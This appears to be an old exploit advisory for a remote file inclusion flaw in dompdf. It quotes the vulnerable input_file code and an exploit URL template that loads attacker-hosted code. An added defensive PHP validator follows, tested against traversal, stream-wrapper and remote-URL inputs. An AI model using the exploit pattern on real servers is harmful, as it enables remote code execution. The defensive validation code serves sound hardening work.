==================================
apps dompdf RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability
[x] DatE : 01 September 2010
[x] AutH0r : Andre_Corleone
[x] Software Link : www.digitaljunkies.ca/dompdf/
[x] h0mE : http://tecon-crew.org
[x] TestEd 0n : linux ubuntu 10.04
[x] d0rK : :P
====================================================

==========================================================================================
[x]bug heRe:

if ( isset($_GET["input_file"]) )
  $file = rawurldecode($_GET["input_file"]);
else
  throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");
==========================================================================================

==================================================================
[x]expL0iT:

http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]
==================================================================

============================================================================================
[x]th4nKs t0:

ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you
============================================================================================

=====================
[x]Jakarta,Indonesia
=====================
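
The snippet above takes input_file straight from the query string with no check on where it points. As an added example (not dompdf code and not from the advisory's author), here is one way to constrain such a parameter to local HTML files under a single directory; the helper name resolve_input_file(), the $baseDir argument and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: resolve_input_file() and $baseDir are hypothetical, not dompdf code.
function resolve_input_file(string $raw, string $baseDir): string
{
    $file = rawurldecode($raw);
    // Reject NUL bytes and any scheme/wrapper prefix (http://, ftp://, php://, data:).
    if (strpos($file, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file)) {
        throw new InvalidArgumentException('remote or wrapper path');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // realpath() resolves ../ and symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('outside allowed directory');
    }
    // Allow-list the extension so only HTML documents reach the converter.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (!in_array($ext, ['html', 'htm'], true)) {
        throw new InvalidArgumentException('unexpected file type');
    }
    return $path;
}

// Constructed demo: a temporary document root with one legitimate file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'docs_' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'report.html', '<p>ok</p>');

// Constructed inputs: one valid name, then values that must be refused.
$samples = ['report.html', 'http%3A%2F%2Fexample.invalid%2Fx.txt%3F', '../../etc/passwd', 'php://input'];
foreach ($samples as $raw) {
    try {
        echo "ACCEPT  $raw -> " . resolve_input_file($raw, $root) . PHP_EOL;
    } catch (Exception $e) {
        echo "REJECT  $raw (" . $e->getMessage() . ')' . PHP_EOL;
    }
}
unlink($root . DIRECTORY_SEPARATOR . 'report.html');
rmdir($root);
```

Only report.html is accepted; the URL, the traversal path and the stream wrapper are each refused before any file is opened.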
Related Exploits
Trying to match CVEs (1): CVE-2010-4879
Trying to match OSVDBs (1): 56579
Trying to match setup file: 4db19b2bf601ac5ff8c3ab49a67e46c8
Other Possible E-DB Search Terms: dompdf 0.6.0 beta1, dompdf
Date | Title | Author |
---|---|---|
2014-04-24 | dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | Portcullis |
2014-12-02 | TYPO3 Extension ke DomPDF - Remote Code Execution | RedTeam Pen... |